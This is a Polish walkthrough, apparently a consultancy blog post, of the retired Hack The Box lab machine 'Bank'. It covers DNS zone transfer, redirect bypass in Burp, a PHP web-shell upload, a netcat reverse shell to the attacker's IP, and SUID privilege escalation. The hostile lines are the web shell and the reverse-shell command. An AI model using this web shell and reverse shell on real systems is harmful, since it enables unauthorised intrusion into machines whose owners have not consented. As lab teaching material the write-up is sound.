Testy penetracyjne pozwalają wcielić się w rolę hakera, aby sprawdzić zabezpieczenia systemów. Dziś pokażę, jak włamałem się do maszyny „Bank” na platformie Hack The Box (HTB).
Czym jest Hack The Box?
Hack The Box to platforma umożliwiająca naukę cyberbezpieczeństwa. Udostępnia maszyny symulujące rzeczywiste systemy, na których można testować swoje umiejętności. Maszyny podzielone są na dwie kategorie:
- Aktywne, których rozwiązania muszą pozostać tajemnicą.
- Retired, czyli te, które można publicznie analizować i publikować walkthrough.
Dziś skupimy się na maszynie „Bank” z kategorii retired. To idealny przykład dla początkujących, aby nauczyć się testów penetracyjnych.
konsultacje
Wzmocnij cyberbezpieczeństwo
swojej firmy już dziś!
Zapisz się na 30-minutową darmową konsultację, aby wstępnie omówić potrzeby związane z cyberbezpieczeństwem w Twojej firmie.
Wspólnie znajdziemy rozwiązanie dopasowane do specyfiki Twojej działalności!
Przygotowanie narzędzi
Do pracy potrzebujesz systemu operacyjnego dedykowanego testom penetracyjnym, np. Kali Linux.
Rekomendowane narzędzia:
- Nmap do skanowania portów,
- Burp Suite do analizy żądań HTTP,
- Feroxbuster do enumeracji zasobów.
Pierwszy krok to połączenie się z siecią VPN HTB. Pobieramy plik konfiguracji OpenVPN i uruchamiamy połączenie. Następnie upewniamy się, że maszyna „Bank” odpowiada, pingując jej adres IP.
Rozpoznanie maszyny
Przeprowadzamy rekonesans, zaczynając od skanowania portów za pomocą Nmap:
nmap -p- -v 10.129.29.200
Znalezione porty to:
- 22 – SSH,
- 53 – serwer DNS (Bind),
- 80 – HTTP.
Dodatkowe skanowanie (-sC -sV) ujawnia, że maszyna działa na systemie Ubuntu Linux. Port 53 wskazuje na potencjalną podatność związaną z Zone Transfer.
Zone Transfer i konfiguracja domen
Zone Transfer pozwala podejrzeć konfigurację DNS. Używamy:
dig axfr @10.129.29.200 bank.htb
Efekt? Otrzymujemy listę domen powiązanych z maszyną:
- bank.htb
- ns.bank.htb
- www.bank.htb.
Dodajemy te wpisy do pliku /etc/hosts, aby móc je przeglądać:
10.129.29.200 bank.htb ns.bank.htb www.bank.htb
Odkrywanie zasobów HTTP
Korzystamy z Feroxbuster w celu zidentyfikowania ukrytych ścieżek:
feroxbuster -u http://bank.htb -x php
Znajdujemy interesujące zasoby, m.in. support.php. Problem? Jest chroniony i wymaga autoryzacji.
Eksploatacja poprzez Burp Suite
Burp Suite pozwala analizować i modyfikować żądania HTTP. Zmieniamy odpowiedź serwera z przekierowania (302) na status „200 OK”. Dzięki temu możemy uzyskać dostęp do ukrytej zawartości serwisu.
Wgrywanie plików i wykonanie kodu
Na stronie support.php mamy możliwość wgrywania plików. Wykorzystujemy to, aby załadować plik PHP z opcją wykonania komend:
<?php echo system($_REQUEST[’cmd’]); ?>
Po wgraniu pliku wywołamy komendy, dodając parametry w adresie URL:
http://bank.htb/uploads/cmd.php?cmd=ls
konsultacje z cyberguru
Gotowy na wzmocnienie cyberbezpieczeństwa swojej firmy?
Zarezerwuj darmową 30-minutową konsultację, aby omówić potrzeby Twojej firmy w zakresie ochrony danych i cyberbezpieczeństwa. Wspólnie zidentyfikujemy zagrożenia i znajdziemy najlepsze rozwiązania dopasowane do Twojego biznesu.
Porozmawiajmy! Kliknij w poniższy przycisk i umów się na bezpłatną konsultację.
Reverse Shell
Aby uzyskać interaktywny dostęp do maszyny, konfigurujemy Reverse Shell:
- Na swojej maszynie uruchamiamy nasłuch:
nc -lvnp 4444 - W przeglądarce wykonujemy komendę, aby połączyć się z naszym serwerem:
http://bank.htb/uploads/cmd.php?cmd=nc 10.10.14.153 4444 -e /bin/bash
Po nawiązaniu połączenia jesteśmy użytkownikiem systemu.
Podniesienie uprawnień (Privilege Escalation)
Na maszynie wyszukujemy pliki z nietypowymi uprawnieniami:
find / -perm -4000 2>/dev/null
Znaleziony plik /htb/bin/emergency umożliwia eskalację uprawnień. Po jego uruchomieniu stajemy się użytkownikiem root:
/htb/bin/emergency
Zdobycie flag
Każda maszyna HTB zawiera dwie flagi:
- User Flag – w katalogu użytkownika:
bash
cat /home/user/user.txt - Root Flag – w katalogu root:
cat /root/root.txt
Wklejamy je na stronie HTB, aby potwierdzić ukończenie zadania.
Wnioski
Testy penetracyjne są niezwykle cenne pod kątem nauki cyberbezpieczeństwa. To proces wymagający cierpliwości, precyzji i ciągłego uczenia się. Pamiętaj jednak, że hakowanie jest legalne tylko w odpowiednich środowiskach testowych lub za zgodą właściciela systemu.
współpraca
Szukasz stałej, kompleksowej obsługi bezpieczeństwa IT Twojej firmy?
Współpracuj ze mną w modelu CISO as a Service
Zostanę zewnętrznym szefem cyberbezpieczeństwa Twojej firmy
CISO as a Service od Cyberguru to:
- działania dot. cyberbezpieczeństwa dostosowane do specyfiki Twojej branży i skali działalności
- strategiczne podejście do bezpieczeństwa IT obejmujące zarządzanie ryzykiem i wdrażanie polityk
- wsparcie operacyjne: od monitorowania bezpieczeństwa IT, przez reagowanie na incydenty, aż po audyty i testy penetracyjne
- stałe podnoszenie świadomości dot. cyberbezpieczeństwa u Twoich pracowników poprzez cykliczne szkolenia
- korzystanie z wiedzy specjalisty, który jest na bieżąco z najnowszymi trendami w branży cyberbezpieczeństwa
- zapewnienie zgodności z lokalnymi i międzynarodowymi przepisami dot. ochrony danych i bezpieczeństwa informacji
- regularne raportowanie o obecnej sytuacji bezpieczeństwa IT w Twojej firmie i zalecanych krokach
- redukcja kosztów związanych z zatrudnieniem pełnoetatowego CISO, szczególnie dla mniejszych firm